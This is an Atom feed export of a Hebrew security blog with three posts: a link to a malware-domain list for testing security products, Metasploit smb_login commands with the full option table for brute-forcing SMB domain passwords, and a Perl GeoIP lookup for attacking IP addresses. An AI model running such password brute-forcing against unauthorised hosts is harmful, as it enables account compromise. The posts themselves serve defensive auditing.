<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" gd:etag="W/&quot;C0MFQnY9fyp7ImA9WhRaE0U.&quot;"><id>tag:blogger.com,1999:blog-841260240678943543</id><updated>2012-02-16T10:36:53.867+02:00</updated><category term="miscrosoft" /><category term="scaning" /><category term="flash" /><category term="Vista" /><category term="phishing alerts" /><category term="list" /><category term="loging" /><category term="windows security" /><category term="internet explorer tips" /><category term="smb" /><category term="security" /><category term="programming" /><category term="passwords" /><category term="malware" /><category term="personal security" /><category term="metasploit" /><category term="Linux howto" /><category term="security pen testing tools" /><category term="Virtual machine howto" /><category term="Linux security" /><category term="backtrack" /><category term="pci" /><category term="Hacking stuff" /><category term="foca" /><category term="virus" /><category term="Administration how to seurity" /><category term="domain" /><category term="security SQL injection" /><category term="Books and reading material" /><category term="metadata" /><category term="Administration how to" /><category term="patch" /><title>Sec-See</title><subtitle type="html">אבטחת מידע,האקינג</subtitle><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://sec-see.blogspot.com/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://sec-see.blogspot.com/" /><link rel="next" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default?start-index=26&amp;max-results=25&amp;redirect=false&amp;v=2" /><author><name>Cooper</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>67</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/Sec-see" /><feedburner:info xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" uri="sec-see" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><entry gd:etag="W/&quot;C04ARHc8eSp7ImA9WhRWEko.&quot;"><id>tag:blogger.com,1999:blog-841260240678943543.post-6328627292215815974</id><published>2011-12-30T21:05:00.000+02:00</published><updated>2011-12-30T21:05:45.971+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-30T21:05:45.971+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="domain" /><category scheme="http://www.blogger.com/atom/ns#" term="virus" /><category scheme="http://www.blogger.com/atom/ns#" term="malware" /><category scheme="http://www.blogger.com/atom/ns#" term="list" /><title>links to malware sites for testing your geers</title><content type="html">&lt;div dir="rtl" style="text-align: right;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-ErF0mhJv2sU/Tv4Jlqt3pJI/AAAAAAAAAQU/s7a3PA15qZk/s1600/virus.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="147" src="http://2.bp.blogspot.com/-ErF0mhJv2sU/Tv4Jlqt3pJI/AAAAAAAAAQU/s7a3PA15qZk/s320/virus.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;אתר מעולה המציג אוסף לינקים לאתרים נגועים בכל רושעה שנחפוץ - מעולה לבדיקת תוכנות AV PROXY IPS וכל שימוש נוסף&amp;nbsp; שאפשר לחשוב עליו .&lt;br /&gt;
האתר מעודכן ע"י הקהילה ואינו מסחרי&lt;br /&gt;
לשימושכם.&lt;br /&gt;
&lt;a href="http://www.malwaredomainlist.com/mdl.php"&gt;http://www.malwaredomainlist.com/mdl.php&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/841260240678943543-6328627292215815974?l=sec-see.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/BQaCKEw5fCA9-ecq7xP9MhbToTU/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/BQaCKEw5fCA9-ecq7xP9MhbToTU/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/BQaCKEw5fCA9-ecq7xP9MhbToTU/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/BQaCKEw5fCA9-ecq7xP9MhbToTU/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://sec-see.blogspot.com/feeds/6328627292215815974/comments/default" title="תגובות לפרסום" /><link rel="replies" type="text/html" href="http://sec-see.blogspot.com/2011/12/links-to-malware-sites-for-testing-your.html#comment-form" title="0 תגובות" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/6328627292215815974?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/6328627292215815974?v=2" /><link rel="alternate" type="text/html" href="http://sec-see.blogspot.com/2011/12/links-to-malware-sites-for-testing-your.html" title="links to malware sites for testing your geers" /><author><name>Cooper</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-ErF0mhJv2sU/Tv4Jlqt3pJI/AAAAAAAAAQU/s7a3PA15qZk/s72-c/virus.png" height="72" width="72" /><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;DEIESXk4eyp7ImA9WhdTEEQ.&quot;"><id>tag:blogger.com,1999:blog-841260240678943543.post-5124905661533578377</id><published>2011-07-08T06:18:00.001+03:00</published><updated>2011-07-08T06:41:48.733+03:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-07-08T06:41:48.733+03:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="domain" /><category scheme="http://www.blogger.com/atom/ns#" term="passwords" /><category scheme="http://www.blogger.com/atom/ns#" term="Hacking stuff" /><category scheme="http://www.blogger.com/atom/ns#" term="loging" /><category scheme="http://www.blogger.com/atom/ns#" term="metasploit" /><category scheme="http://www.blogger.com/atom/ns#" term="smb" /><category scheme="http://www.blogger.com/atom/ns#" term="backtrack" /><title>מודול בדיקת סיסמאות בדומיין (smb)</title><content type="html">&lt;div dir="rtl" style="text-align: right;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-wBxoAaFnXSU/ThZ8UldjCUI/AAAAAAAAAQI/VTvYYJz-_zs/s1600/bruteforce.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="256" src="http://1.bp.blogspot.com/-wBxoAaFnXSU/ThZ8UldjCUI/AAAAAAAAAQI/VTvYYJz-_zs/s320/bruteforce.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;לצורך בדיקת סיסמאות בדומיין (כניסה לתחנות- SMB) ,אני משתמש במודול&amp;nbsp; חזק של :metasploit&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
הפעלה:&lt;br /&gt;
&lt;br /&gt;
$ &lt;b&gt;msfconsole&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
msf &amp;gt; &lt;b&gt;use auxiliary/scanner/smb/smb_login&lt;/b&gt;&lt;br /&gt;
msf auxiliary(smb_login) &amp;gt; &lt;b&gt;set RHOSTS [TARGET HOST RANGE]&lt;/b&gt;&lt;br /&gt;
msf auxiliary(smb_login); &lt;b&gt;run&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;h1&gt;Module Options&lt;/h1&gt;&lt;table border="1" cellpadding="6" cellspacing="0"&gt;&lt;tbody&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;BLANK_PASSWORDS&lt;/td&gt;&lt;td&gt;Try blank passwords for all users (default: true)&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optreq"&gt;BRUTEFORCE_SPEED&lt;/td&gt;&lt;td&gt;How fast to bruteforce, from 0 to 5 (default: 5)&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;PASS_FILE&lt;/td&gt;&lt;td&gt;File containing passwords, one per line&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;PRESERVE_DOMAINS&lt;/td&gt;&lt;td&gt;Respect a username that contains a domain name. (default: true)&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optreq"&gt;RHOSTS&lt;/td&gt;&lt;td&gt;The target address range or CIDR identifier&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optreq"&gt;RPORT&lt;/td&gt;&lt;td&gt;Set the SMB service port (default: 445)&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;SMBDomain&lt;/td&gt;&lt;td&gt;SMB Domain (default: WORKGROUP)&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;SMBPass&lt;/td&gt;&lt;td&gt;SMB Password&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;SMBUser&lt;/td&gt;&lt;td&gt;SMB Username&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optreq"&gt;STOP_ON_SUCCESS&lt;/td&gt;&lt;td&gt;Stop guessing when a credential works for a host&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optreq"&gt;THREADS&lt;/td&gt;&lt;td&gt;The number of concurrent threads (default: 1)&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;USERPASS_FILE&lt;/td&gt;&lt;td&gt;File containing users and passwords separated by space, one pair per line&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;USER_AS_PASS&lt;/td&gt;&lt;td&gt;Try the username as the password for all users (default: true)&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;USER_FILE&lt;/td&gt;&lt;td&gt;File containing usernames, one per line&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optreq"&gt;VERBOSE&lt;/td&gt;&lt;td&gt;Whether to print output for all attempts (default: true)&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;CHOST&lt;/td&gt;&lt;td&gt;The local client address&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;CPORT&lt;/td&gt;&lt;td&gt;The local client port&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;ConnectTimeout&lt;/td&gt;&lt;td&gt;Maximum number of seconds to establish a TCP connection&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;DCERPC::ReadTimeout&lt;/td&gt;&lt;td&gt;The number of seconds to wait for DCERPC responses&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;MaxGuessesPerService&lt;/td&gt;&lt;td&gt;Maximum number of credentials to try per service instance. If set to zero or a non-number, this option will not be used.&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;MaxGuessesPerUser&lt;/td&gt;&lt;td&gt;Maximum guesses for a particular username for the service instance. Note that users are considered unique among different services, so a user at 10.1.1.1:22 is different from one at 10.2.2.2:22, and both will be tried up to the MaxGuessesPerUser limit. If set to zero or a non-number, this option will not be used.&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;MaxMinutesPerService&lt;/td&gt;&lt;td&gt;Maximum time in minutes to bruteforce the service instance. If set to zero or a non-number, this option will not be used.&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;NTLM::SendLM&lt;/td&gt;&lt;td&gt;Always send the LANMAN response (except when NTLMv2_session is specified)&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;NTLM::SendNTLM&lt;/td&gt;&lt;td&gt;Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;NTLM::SendSPN&lt;/td&gt;&lt;td&gt;Send an avp of type SPN in the ntlmv2 client Blob, this allow authentification on windows Seven/2008r2 when SPN is required&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;NTLM::UseLMKey&lt;/td&gt;&lt;td&gt;Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;NTLM::UseNTLM2_session&lt;/td&gt;&lt;td&gt;Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;NTLM::UseNTLMv2&lt;/td&gt;&lt;td&gt;Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;Proxies&lt;/td&gt;&lt;td&gt;Use a proxy chain&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;REMOVE_PASS_FILE&lt;/td&gt;&lt;td&gt;Automatically delete the PASS_FILE on module completion&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;REMOVE_USERPASS_FILE&lt;/td&gt;&lt;td&gt;Automatically delete the USERPASS_FILE on module completion&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;REMOVE_USER_FILE&lt;/td&gt;&lt;td&gt;Automatically delete the USER_FILE on module completion&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;SMB::ChunkSize&lt;/td&gt;&lt;td&gt;The chunk size for SMB segments, bigger values will increase speed but break NT 4.0 and SMB signing&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;SMB::Native_LM&lt;/td&gt;&lt;td&gt;The Native LM to send during authentication&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;SMB::Native_OS&lt;/td&gt;&lt;td&gt;The Native OS to send during authentication&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;SMB::VerifySignature&lt;/td&gt;&lt;td&gt;Enforces client-side verification of server response signatures&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;SMBDirect&lt;/td&gt;&lt;td&gt;The target port is a raw SMB service (not NetBIOS)&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;SMBName&lt;/td&gt;&lt;td&gt;The NetBIOS hostname (required for port 139 connections)&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;SSL&lt;/td&gt;&lt;td&gt;Negotiate SSL for outgoing connections&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;SSLVersion&lt;/td&gt;&lt;td&gt;Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;ShowProgress&lt;/td&gt;&lt;td&gt;Display progress messages during a scan&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;ShowProgressPercent&lt;/td&gt;&lt;td&gt;The interval in percent that progress should be shown&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;WORKSPACE&lt;/td&gt;&lt;td&gt;Specify the workspace for this module&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;DCERPC::fake_bind_multi&lt;/td&gt;&lt;td&gt;Use multi-context bind calls&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;DCERPC::fake_bind_multi_append&lt;/td&gt;&lt;td&gt;Set the number of UUIDs to append the target&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;DCERPC::fake_bind_multi_prepend&lt;/td&gt;&lt;td&gt;Set the number of UUIDs to prepend before the target&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;DCERPC::max_frag_size&lt;/td&gt;&lt;td&gt;Set the DCERPC packet fragmentation size&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;DCERPC::smb_pipeio&lt;/td&gt;&lt;td&gt;Use a different delivery method for accessing named pipes (accepted: rw, trans)&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;SMB::obscure_trans_pipe_level&lt;/td&gt;&lt;td&gt;Obscure PIPE string in TransNamedPipe (level 0-3)&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;SMB::pad_data_level&lt;/td&gt;&lt;td&gt;Place extra padding between headers and data (level 0-3)&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;SMB::pad_file_level&lt;/td&gt;&lt;td&gt;Obscure path names used in open/create (level 0-3)&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;SMB::pipe_evasion&lt;/td&gt;&lt;td&gt;Enable segmented read/writes for SMB Pipes&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;SMB::pipe_read_max_size&lt;/td&gt;&lt;td&gt;Maximum buffer size for pipe reads&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;SMB::pipe_read_min_size&lt;/td&gt;&lt;td&gt;Minimum buffer size for pipe reads&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;SMB::pipe_write_max_size&lt;/td&gt;&lt;td&gt;Maximum buffer size for pipe writes&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;SMB::pipe_write_min_size&lt;/td&gt;&lt;td&gt;Minimum buffer size for pipe writes&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;TCP::max_send_size&lt;/td&gt;&lt;td&gt;Maxiumum tcp segment size.  (0 = disable)&lt;/td&gt;&lt;/tr&gt;
&lt;tr class="rowcola"&gt;&lt;td class="optopt"&gt;TCP::send_delay&lt;/td&gt;&lt;td&gt;Delays inserted before every send.  (0 = disable)&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
&lt;aside class="rCol"&gt;&lt;div class="rhsBox rhsDownloadMsp"&gt;&lt;div class="rhsPad clearfix"&gt;&lt;h5&gt;&amp;nbsp;&lt;/h5&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="rhsBox rhsGetInvolved"&gt;&lt;div class="rhsPad clearfix"&gt;&lt;div class="clearfix"&gt;&amp;nbsp;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/aside&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/841260240678943543-5124905661533578377?l=sec-see.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/usgMgKwJFgLVudDAJ_YZCDvKHOQ/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/usgMgKwJFgLVudDAJ_YZCDvKHOQ/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/usgMgKwJFgLVudDAJ_YZCDvKHOQ/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/usgMgKwJFgLVudDAJ_YZCDvKHOQ/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;</content><link rel="replies" type="application/atom+xml" href="http://sec-see.blogspot.com/feeds/5124905661533578377/comments/default" title="תגובות לפרסום" /><link rel="replies" type="text/html" href="http://sec-see.blogspot.com/2011/07/smb.html#comment-form" title="1 תגובות" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/5124905661533578377?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/841260240678943543/posts/default/5124905661533578377?v=2" /><link rel="alternate" type="text/html" href="http://sec-see.blogspot.com/2011/07/smb.html" title="מודול בדיקת סיסמאות בדומיין (smb)" /><author><name>Cooper</name><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-wBxoAaFnXSU/ThZ8UldjCUI/AAAAAAAAAQI/VTvYYJz-_zs/s72-c/bruteforce.jpg" height="72" width="72" /><thr:total>1</thr:total></entry><entry gd:etag="W/&quot;CUQFQHozfSp7ImA9Wx5TFUQ.&quot;"><id>tag:blogger.com,1999:blog-841260240678943543.post-5876512756723050383</id><published>2010-07-31T18:49:00.001+03:00</published><updated>2010-07-31T19:21:51.485+03:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-07-31T19:21:51.485+03:00</app:edited><title>GEO IP  - שימוש ב PERL לזיהוי מקורות שמות אתרים וכתובות IP</title><content type="html">&lt;div dir="rtl" style="text-align: right;" trbidi="on"&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_vzNe-NaiwJI/TFRFth6ZURI/AAAAAAAAAPw/iAhQeQ_d-Lg/s1600/31-07-2010+18-47-31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" bx="true" height="232" src="http://2.bp.blogspot.com/_vzNe-NaiwJI/TFRFth6ZURI/AAAAAAAAAPw/iAhQeQ_d-Lg/s400/31-07-2010+18-47-31.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
לא אחת אני נזקק לזיהוי מקור עולמי של כתובות IP המתקיפות את הארגון או זיהוי מידע הנשלח מהארגון .&lt;br /&gt;
נכון להיום אין לי כלי מסחרי היודע לנתח את נתוני ה FW ,PROXY וכו ולהראות מיפוי עולמי של גישות אלו.&lt;br /&gt;
&lt;br /&gt;
קיימות מספר חבילות PERL שדרכם ניתן לפרסר כתובות IP ושמות DOMAIN ולזהות את ארץ המקור &lt;br /&gt;
אני אתמקד בחבילה: &lt;strong&gt;Geo::IPfree&lt;/strong&gt;&lt;br /&gt;
את החבילה ניתן להוריד בקלות דרך ה PACKEGE MANAGER של ה ACTIVE PERL ,החבילה כוללת מספר יכולות אשר ניתן ללמוד עליהם כאן:&lt;br /&gt;
&lt;a href="http://search.cpan.org/~bricas/Geo-IPfree-1.101650/lib/Geo/IPfree.pm"&gt;http://search.cpan.org/~bricas/Geo-IPfree-1.101650/lib/Geo/IPfree.pm&lt;/a&gt;&lt;br /&gt;
בנוסף החבילה מגיעה עם קובץ DAT המהווה למעשה את ה DB המקומי של הרשתות בעולם .&lt;br /&gt;
את הקובץ רצוי לשדרגאחת לשבוע עד חודש &amp;nbsp;כאן:&lt;br /&gt;
&lt;a href="http://software77.net/geo-ip/?DL=4&amp;amp;x=Download"&gt;http://software77.net/geo-ip/?DL=4&amp;amp;x=Download&lt;/a&gt;&lt;br /&gt;
יש למקם אותו בספרית ה PERL במקום הקובץ המקורי המגיע עם החבילה:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_vzNe-NaiwJI/TFRBI6vuy5I/AAAAAAAAAPg/5n-hvJeGTpk/s1600/31-07-2010+18-27-47.png" imageanchor="1" style="clear: right; cssfloat: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" bx="true" src="http://4.bp.blogspot.com/_vzNe-NaiwJI/TFRBI6vuy5I/AAAAAAAAAPg/5n-hvJeGTpk/s320/31-07-2010+18-27-47.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;סקריפט לדוגמא הקורא מקובץ CSV את העמודה הראשונה - בודק אותה מול ה GEOIP ומחזיר קובץ CSV חדש בתוספת העמודה הגאוגרפית:&lt;br /&gt;
&lt;br /&gt;
&lt;table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_vzNe-NaiwJI/TFREJKeLSzI/AAAAAAAAAPo/01UhNSKifkg/s1600/geoip.png" imageanchor="1" style="clear: right; cssfloat: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" bx="true" height="390" src="http://2.bp.blogspot.com/_vzNe-NaiwJI/TFREJKeLSzI/AAAAAAAAAPo/01UhNSKifkg/s400/geoip.png" width="400" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;ניתן לשנות ולשהתמש בחלקים בהערה במקום הקיים&lt;br /&gt;
&lt;br /&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;להורדת הסקריפט:&lt;br /&gt;
&lt;a href="https://docs.google.com/leaf?id=0B2RudizokeYDMzhjMjQ4NTQtM2RlMi00YzBlLTkwMGUtNGVmYWY4NWE1YThh&amp;amp;sort=name&amp;amp;layout=list&amp;amp;num=50"&gt;https://docs.google.com/leaf?id=0B2RudizokeYDMzhjMjQ4NTQtM2RlMi00YzBlLTkwMGUtNGVmYWY4NWE1YThh&amp;amp;sort=name&amp;amp;layout=list&amp;amp;num=50&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div align="left"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: left;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/841260240678943543-5876512756723050383?l=sec-see.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/eLWDnchcff_6qYBRZ1Oc2X4wQlA/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/eLWDnchcff_6qYBRZ1Oc2X4wQlA/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
